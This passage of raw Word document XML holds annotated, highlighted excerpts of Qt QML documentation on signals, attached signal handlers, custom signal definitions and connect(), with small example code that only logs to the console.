          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If there was no Component.onCompleted attached signal handler, for example, then an object could not receive this notification without registering for some special signal from some special object. </w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached signal handler</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mechanism enables objects to receive particular signals without these extra processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="00EA1A01" w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>advantage of this mechanism. Concrete object decides to what to connect</w:t>
      </w:r>
      <w:r w:rsidR="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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lastRenderedPageBreak/>
        <w:t>See </w:t>
      </w:r>
      <w:hyperlink r:id="rId2703" w:anchor="attached-properties-and-attached-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Attached properties and attached signal handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> for more information on attached signal handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00490E7E" w:rsidRDefault="00D77D11" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2427" w:name="adding-signals-to-custom-qml-types"/>
      <w:bookmarkStart w:id="2428" w:name="_Toc483001058"/>
      <w:bookmarkStart w:id="2429" w:name="_Toc483004047"/>
      <w:bookmarkStart w:id="2430" w:name="_Toc483604393"/>
      <w:bookmarkStart w:id="2431" w:name="_Toc483605613"/>
      <w:bookmarkEnd w:id="2427"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adding Signals to Custom QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2428"/>
      <w:bookmarkEnd w:id="2429"/>
      <w:bookmarkEnd w:id="2430"/>
      <w:bookmarkEnd w:id="2431"/>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 xml:space="preserve">Signals </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be added to custom QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the signal keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for defining a new signal is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00D77D11" w:rsidRDefault="00D77D11" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal &lt;name&gt;[([&lt;type&gt; &lt;parameter name&gt;[, ...]])]</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 xml:space="preserve">A signal is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emitted by invoking the signal as a method</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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 xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, say the code below is defined in a file named SquareButton.qml. The root </w:t>
      </w:r>
      <w:hyperlink r:id="rId2704" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> object has an activated signal. When the child </w:t>
      </w:r>
      <w:hyperlink r:id="rId2705" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is clicked, it emits the parent's activated signal with the coordinates of the mouse click:</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SquareButton.qml</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Rectangle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id: root</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signal activated(real xPosition, real yPosition)</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property int side: 100</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width: side; height: side</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MouseArea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anchors.fill: parent</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onPressed: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root.activated(mouse.x, mouse.y)</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Now any objects of the SquareButton can connect to the activated signal using an onActivated signal handler:</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myapplication.qml</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SquareButton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onActivated: console.log("Activated at " + xPosition + "," + yPosition)</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See </w:t>
      </w:r>
      <w:hyperlink r:id="rId2706" w:anchor="signal-attributes" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Signal Attributes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> for more details on writing signals for custom QML types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00490E7E" w:rsidRDefault="00D77D11" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2432" w:name="qml-connect-signals-to-method"/>
      <w:bookmarkStart w:id="2433" w:name="connecting-signals-to-methods-and-signal"/>
      <w:bookmarkStart w:id="2434" w:name="_Toc483001059"/>
      <w:bookmarkStart w:id="2435" w:name="_Toc483004048"/>
      <w:bookmarkStart w:id="2436" w:name="_Toc483604394"/>
      <w:bookmarkStart w:id="2437" w:name="_Toc483605614"/>
      <w:bookmarkEnd w:id="2432"/>
      <w:bookmarkEnd w:id="2433"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connecting Signals to Methods and Signals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2434"/>
      <w:bookmarkEnd w:id="2435"/>
      <w:bookmarkEnd w:id="2436"/>
      <w:bookmarkEnd w:id="2437"/>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Signal objects have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect a signal either to a method or another signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a signal is connected to a method, the method is automatically invoked whenever the signal is emitted. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enables</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal to be received by a method instead of a signal handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00D77D11" w:rsidRDefault="00D77D11" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Below</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the messageReceived signal is connected to three methods using the connect()method:</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Rectangle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id: relay</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signal messageReceived(string person, string notice)</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Component.onCompleted: {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00EA1A01" w:rsidRDefault="00D77D11" w:rsidP="00EA1A01">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relay.messageReceived.connect(sendToPost)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00EA1A01" w:rsidRDefault="00D77D11" w:rsidP="00EA1A01">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        relay.messageReceived.connect(sendToTelegraph)</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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        relay.messageReceived.connect(sendToEmail)</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relay.messageReceived("Tom", "Happy Birthday")</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    function sendToPost(person, notice)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console.log("Sending to post: " + person + ", " + notice)</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function sendToTelegraph(person, notice)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console.log("Sending to telegraph: " + person + ", " + notice)</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function sendToEmail(person, notice)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console.log("Sending to email: " + person + ", " + notice)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00C10CB8"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t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00C10CB8" w:rsidRDefault="00D77D11" w:rsidP="00EA1A01">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00D77D11" w:rsidRDefault="00D77D11" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In many cases it is sufficient to receive signals through signal handlers rather than using the connect() function</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. However, using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect method allows a signal to be received by multiple methods as shown above</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which would not be possible with signal handlers as they must be uniquely named. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Also</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the connect method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>useful when connecting signals to </w:t>
      </w:r>
      <w:hyperlink r:id="rId2707" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dynamically created objects</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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There is a corresponding</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disconnect()</w:t>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
